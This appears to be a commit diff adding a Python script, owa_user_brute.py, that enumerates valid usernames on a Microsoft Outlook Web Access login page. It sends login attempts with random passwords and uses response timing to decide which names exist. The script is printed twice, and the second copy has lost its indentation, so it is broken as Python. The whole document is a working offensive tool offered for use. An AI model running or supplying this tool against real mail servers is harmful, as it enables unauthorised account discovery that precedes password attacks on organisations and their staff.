aniqfakhrul · August 24, 2021 05:08
diff --git a/owa_user_brute.py b/owa_user_brute.py
 #!/usr/bin/env python3
 import requests
 import sys
 import time
 from requests.packages.urllib3.exceptions import InsecureRequestWarning
 import random
 import string
 requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

 hostname = "change hostname or ip"
 url = f'https://{hostname}/owa/auth.owa' # change here if no ssl
 base_time = 1 
 timeout = 2
 proxies = {
    'http':'http://127.0.0.1:8080',
    'https':'http://127.0.0.1:8000',
        }

 headers = {
    'User-Agent' : 'User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',
    'Cookie' : 'PBack=0',
        }

 def is_valid(start_time, end_time):
    dif = end_time - start_time
    if dif <= 1:
        return True
    else:
        return False

 def authenticate(username,password):
    data = {
            'destination': f'https://{hostname}/owa/',
            'flags':'4',
            'forcedownlevel':'0',
            'username':username,
            'password':password,
            'isUtf8':'1'
            }
    res = requests.post(url, data=data, verify=False,timeout=timeout)
    return res

 def main():
    found_user = []
    user_wordlist_file = "user.lst"
    user_list = b"" 
    try:
        user_list = open(user_wordlist_file).readlines()
    except FileNotFoundError:
        print(f"{user_wordlist_file} file not found")
        sys.exit(0)

    for user in user_list:
        username = user.strip()
        password = ''.join(random.choice(string.ascii_letters) for i in range(10))
        
        # get execution time
        start_time = time.time()
        # authenticate to owa
        res = authenticate(username,password)
        end_time = time.time()
        
        # get response time
        if is_valid(start_time, end_time):
            print(f"[+] VALID USER: {username}")
            found_user.append(username)
        
    print(f"Found {len(found_user)} user(s)")

    return None

 if __name__ == "__main__":
    main()
	#!/usr/bin/env python3
	import requests
	import sys
	import time
	from requests.packages.urllib3.exceptions import InsecureRequestWarning
	import random
	import string
	requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

	hostname = "change hostname or ip"
	url = f'https://{hostname}/owa/auth.owa' # change here if no ssl
	base_time = 1
	timeout = 2
	proxies = {
	'http':'http://127.0.0.1:8080',
	'https':'http://127.0.0.1:8000',
	}

	headers = {
	'User-Agent' : 'User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',
	'Cookie' : 'PBack=0',
	}

	def is_valid(start_time, end_time):
	dif = end_time - start_time
	if dif <= 1:
	return True
	else:
	return False

	def authenticate(username,password):
	data = {
	'destination': f'https://{hostname}/owa/',
	'flags':'4',
	'forcedownlevel':'0',
	'username':username,
	'password':password,
	'isUtf8':'1'
	}
	res = requests.post(url, data=data, verify=False,timeout=timeout)
	return res

	def main():
	found_user = []
	user_wordlist_file = "user.lst"
	user_list = b""
	try:
	user_list = open(user_wordlist_file).readlines()
	except FileNotFoundError:
	print(f"{user_wordlist_file} file not found")
	sys.exit(0)

	for user in user_list:
	username = user.strip()
	password = ''.join(random.choice(string.ascii_letters) for i in range(10))

	# get execution time
	start_time = time.time()
	# authenticate to owa
	res = authenticate(username,password)
	end_time = time.time()

	# get response time
	if is_valid(start_time, end_time):
	print(f"[+] VALID USER: {username}")
	found_user.append(username)

	print(f"Found {len(found_user)} user(s)")

	return None

	if __name__ == "__main__":
	main()